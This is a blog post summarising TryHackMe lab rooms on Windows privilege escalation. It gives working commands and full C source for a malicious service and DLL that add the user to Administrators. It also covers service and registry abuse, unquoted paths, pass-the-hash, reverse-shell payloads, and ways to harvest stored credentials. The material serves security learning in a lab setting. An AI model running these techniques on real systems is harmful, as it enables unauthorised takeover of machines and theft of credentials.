TryHackMe | Windows Privilege Escalation

In this post, I summarize lessons learned from two rooms covering Windows Privilege Escalation on TryHackMe

a year ago   •   5 min read

By 0xBEN
Table of contents

Rooms

These are just some of the things you can try to escalate privilege on a Windows system. This is not meant to be an exhaustive list, and is just scratching the surface of Windows privilege escalation.

Be flexible and diligent in your checks. Most of these are just examples and you don't have to follow them word-for-word. Check other services, other files, other registry keys, use these as an example.





Registry

Autorun

Method 1: Registry

  • Check for autorun programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • If there are any autorun programs, you may be able to overwrite the binary
  • Use the accesschk.exe or icacls to check your permissions on this directory
    • accesschk.exe /accepteula -wvu C:\Program Files\Autorun Program\
    • If any of the files are writable, can overwrite with a reverse shell payload
    • When an administrative user logs on, we can get an elevated shell
    • Need to have listener running continuously to catch logons



AlwaysInstallElevated

  • Check if the AlwaysInstallElevated setting has been enabled
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
  • If either of those queries return 1, can get an elevated shell
  • Use msfvenom to create an .msi payload and run it on the target
    • Start a listener
    • Run this commamnd to install the malicious program
msiexec /quiet /qn /i <path to msi>





Services

HKLM:\System\CurrentControlSet\services\regsvc

  • Open PowerShell and check your permissions on this regitry key
Get-Acl hklm:\System\CurrentControlSet\services\regsvc
  • If your user accout or a group you're a member of can register services, then you can create a malicious service to perform a privileged task
  • Create a dummy Windows service
    • An example service is shown below
      • Modify the source code here
      • Enter the command in system()
    • Use the command cmd.exe /k net localgroup administrators user /add
    • This will add the current user to the Administrators local group
  • In Kali, compile the .c code to a .exe
x86_64-w64-mingw32-gcc windows_service.c -o privesc.exe
  • Transfer privesc.exe to a writable folder on the target
  • Register the service
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d [C:\Path\to\privesc.exe] /f
  • Start the service
sc.exe start regsvc
  • Confirm the current user has been added to the local administrator group

windows_service.c

#include <windows.h>  
#include <stdio.h>  
  
#define SLEEP_TIME 5000  
  
SERVICE_STATUS ServiceStatus;    
SERVICE_STATUS_HANDLE hStatus;    
   
void ServiceMain(int argc, char** argv);    
void ControlHandler(DWORD request);    
  
//add the payload here  
int Run()    
{    
   system("cmd.exe /k net localgroup administrators user /add");  
   return 0;    
}    
  
int main()    
{    
   SERVICE_TABLE_ENTRY ServiceTable[2];  
   ServiceTable[0].lpServiceName = "MyService";  
   ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;  
  
   ServiceTable[1].lpServiceName = NULL;  
   ServiceTable[1].lpServiceProc = NULL;  
   
   StartServiceCtrlDispatcher(ServiceTable);     
   return 0;  
}  
  
void ServiceMain(int argc, char** argv)    
{    
   ServiceStatus.dwServiceType        = SERVICE_WIN32;    
   ServiceStatus.dwCurrentState       = SERVICE_START_PENDING;    
   ServiceStatus.dwControlsAccepted   = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN  
;  
   ServiceStatus.dwWin32ExitCode      = 0;    
   ServiceStatus.dwServiceSpecificExitCode = 0;    
   ServiceStatus.dwCheckPoint         = 0;    
   ServiceStatus.dwWaitHint           = 0;    
   
   hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandl  
er);    
   Run();    
      
   ServiceStatus.dwCurrentState = SERVICE_RUNNING;    
   SetServiceStatus (hStatus, &ServiceStatus);  
   
   while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)  
   {  
               Sleep(SLEEP_TIME);  
   }  
   return;    
}  
  
void ControlHandler(DWORD request)    
{    
   switch(request)    
   {    
       case SERVICE_CONTROL_STOP:    
                       ServiceStatus.dwWin32ExitCode = 0;    
           ServiceStatus.dwCurrentState  = SERVICE_STOPPED;    
           SetServiceStatus (hStatus, &ServiceStatus);  
           return;    
   
       case SERVICE_CONTROL_SHUTDOWN:    
           ServiceStatus.dwWin32ExitCode = 0;    
           ServiceStatus.dwCurrentState  = SERVICE_STOPPED;    
           SetServiceStatus (hStatus, &ServiceStatus);  
           return;    
          
       default:  
           break;  
   }    
   SetServiceStatus (hStatus,  &ServiceStatus);  
   return;    
}



File Permissions Service

  • You can follow this process on other services as well
    • The File Permissions Service is just used here as an example
  • Check the configuration of filepermsvc
sc.exe qc filepermsvc
  • Note that it runs as SYSTEM
  • See if you or a group you're in can modify the service
accesschk64.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
  • For example, if Everyone has FILE_ALL_ACCESS, you can overwrite the service binary, so when the service starts, the malicious binary is run
  • Using the windows_service.c service from before
    • Or, could be a reverse shell to spawn a SYSTEM shell
    • Copy privesc.exe as C:\Program Files\File Permissions Service\filepermservice.exe
  • Run this command to restart the service
sc.exe stop filepermsvc && start filepermsvc
  • Current user should have been added to local administrator group



DLL Hijacking

  • In this example, a service loads a DLL from a directory where we have write permissions
    • We can determine this by running procmon on the target
    • Or by running the executable copied from the target on a test machine
  • We can create a malicious DLL that will be loaded by the service instead
    • Compile the C code to DLL on Kali:
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijacked.dll
  • Copy the DLL to the target path
  • Start the service
sc.exe start <service>

Example DLL Code

// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll  
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll  
  
#include <windows.h>  
  
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {  
   if (dwReason == DLL_PROCESS_ATTACH) {  
       system("cmd.exe /k net localgroup administrators user /add");  
       ExitProcess(0);  
   }  
   return TRUE;  
}



Insecure Service Permissions

  • Similar to the File Permissions Service attack before
  • Check a service's permissions to see if we can modify it
    • In this example, we're checking daclsvc , but other services should be checked as well
accesschk.exe /accepteula -uwcqv daclsvc
accesschk64.exe /accepteula -wuvc daclsvc
  • Query the service to see if it runs as System
sc.exe qc daclsvc
  • If we have SERVICE_CHANGE_CONFIG, we can manipulate a service
sc.exe config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc
  • This will add the current user to the local Administrators group when the service is started or restarted



Unquoted Service Path

  • sc.exe qc <service> to query a service
  • Especially useful if a service is running as NT Authority\SYSTEM
  • If a service's BINARY_PATH_NAME is not wrapped in quotes
    • Example: C:\Program Files\Service Directory\awesome.exe
    • We need to find if any part of that path is writable
    • If C:\ is writable, we can create a Program.exe payload
    • If C:\Program Files\ is writable, we can a create Service.exe payload
    • If C:\Program Files\Service Directory\ is writable, we can create an awesome.exe payload





Startup Applications

  • In a lower privileged shell, run
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
  • If BUILTIN\Users has (F), we can add a payload there
  • Use msfvenom to generate a reverse shell exe payload
  • Put the payload in the folder
  • Start a listener
  • Wait for an admin to login





Passing the Hash

pth-winexe

  • pth-winexe -U 'username%hash' //MACHINE_IP cmd.exe
  • If you have a hash of a user
  • This is just an example, I've written more notes here on passing the hash





Scheduled Tasks

  • Check for scheduled tasks running as privileged accounts
  • If the task is running a script, check the permissions on the script
accesschk.exe /accepteula -quvw user C:\path\to\script
  • May be able to overwrite or modify the script contents
  • Could run a command or reverse shell





Hot Potato

Invoke-Tater

  • Invoke-Tater.ps1
  • If the host is vulnerable to the Hot Potato privilege escalation, will run commands as System , as we will be able to impersonate the SYSTEM account
  • Import the script
Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add
  • Current user should now be a member of the local administrators group





Password Mining

Registry

  • Search for the word password recursively
reg query HKLM /f password /t REG_SZ /s
  • Might be something here as a quick search
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
  • Spawn an admin shell from Kali
winexe -U 'username%password' //target-ip cmd.exe
  • This is just an example. I've written more notes here on passing the password.



cmdkey

  • cmdkey /list to list any saved credentials
  • Start a reverse shell as the user
runas /savecred /user:username C:\PrivEsc\reverse.exe



C:\Windows\Panther\Unattend.xml

  • Check the <Password> property for a base64 encoded password



Internet Explorer Memory Dump

  • Start msfconsole
use auxiliary/server/capture/http_basic
set uripath pwn
run
  • Victim
    • Open Internet Explorer
    • Go to http://kali-ip/pwn
    • Open Task Manager
    • Right-click iexpore.exe > Image Name > Create Dump File
    • Transfer the .DMP file to Kali
  • Kali
    • Check if there are any saved credentials in the IE dump
strings file.DMP | grep "Authorization: Basic"
  • If so, decode the base64 string.
echo -ne "base64string" | base64 -d





GUI Apps

Run as Admin

  • If a GUI app is set to run as admin at launch
    • Example: MS Paint
      • Launch Paint
        • File > Open
        • Enter file://C:/Windows/System32/cmd.exe





Kernel Exploits

Scripts

  • Can run exploit suggesting scripts to detect kernel exploits
  • winPEASany.exe
  • Seatbelt.exe
  • PowerUp.ps1
  • SharpUp.exe

Spread the word

Keep reading